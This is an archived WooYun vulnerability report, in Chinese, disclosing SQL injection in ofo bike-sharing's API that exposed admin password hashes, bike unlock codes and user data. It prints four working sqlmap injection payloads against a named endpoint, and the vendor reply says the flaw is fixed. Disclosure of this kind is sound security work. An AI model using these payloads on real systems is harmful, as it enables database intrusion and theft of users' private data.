ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192366

漏洞标题：ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

漏洞作者：路人甲

提交时间：2016-04-24 22:17

修复时间：2016-04-25 17:02

公开时间：2016-04-25 17:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-24：细节已通知厂商并且等待厂商处理中
2016-04-25：厂商已经确认，细节仅向厂商公开
2016-04-25：厂商已经修复漏洞并主动公开，细节向公众公开

简要描述：

某处 api 没有对 SQL 注入过滤，导致后台密码，车辆密码，用户隐私泄露。

详细说明：

主站 www.ofo.so/Api/getPacket 红包页面没有对 SQL 注入过滤。

可以直接注入。

---
Parameter: tel (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: tel=12343211234") AND 7541=7541#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tel=12343211234") AND (SELECT 4714 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(4714=4714,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("SFUv"="SFUv&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: tel=12343211234");(SELECT * FROM (SELECT(SLEEP(5)))xnKx)#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: tel=12343211234") AND (SELECT * FROM (SELECT(SLEEP(5)))UCSC) AND ("RqRC"="RqRC&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
---

[INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.29, PHP 5.4.27
back-end DBMS: MySQL 5.0
另外警告一下 san.ofo.so 也有注入漏洞，懒得深入了，麻烦自查。

漏洞证明：

--tables

所有后台用户密码为单次 md5，随意破。

后台地址全都在 sp_auth_rule 里。没有授权可以随意访问。
随便登录一个试试

懒得脱库了，要跑太久，随便拖几个看看，好像 CEO 的学号和手机也漏了

车密码

看这数据库一溜 null 看来代码管理真是混乱。。心疼小黄车

修复方案：

www.ofo.so 和 san.ofo.so 麻烦都上个 WAF 谢谢，很容易上马拿到认证用的学生证照片的。网站后台用thinkcmf请及时升级。

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2016-04-25 17:00

厂商回复：

非常感谢作者，不过这个版本的接口我们已经淘汰掉了。您查看的这个版本是php的，并且表名和表结构都已经变了。不知道能否知晓一下你查看这个版本的时间。因为有段时间php和java版两个同时存在，是为了过渡一下旧版的app保留。现在php版已经无法使用了。真的非常感谢您。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192366

漏洞标题：ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

相关厂商：ofo.so

漏洞作者：路人甲

提交时间：2016-04-24 22:17

修复时间：2016-04-25 17:02

公开时间：2016-04-25 17:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：厂商已经修复

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0192366

漏洞标题：ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

相关厂商：ofo.so

漏洞作者： 路人甲

提交时间：2016-04-24 22:17

修复时间：2016-04-25 17:02

公开时间：2016-04-25 17:02

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：13

漏洞状态：厂商已经修复

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0192366"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云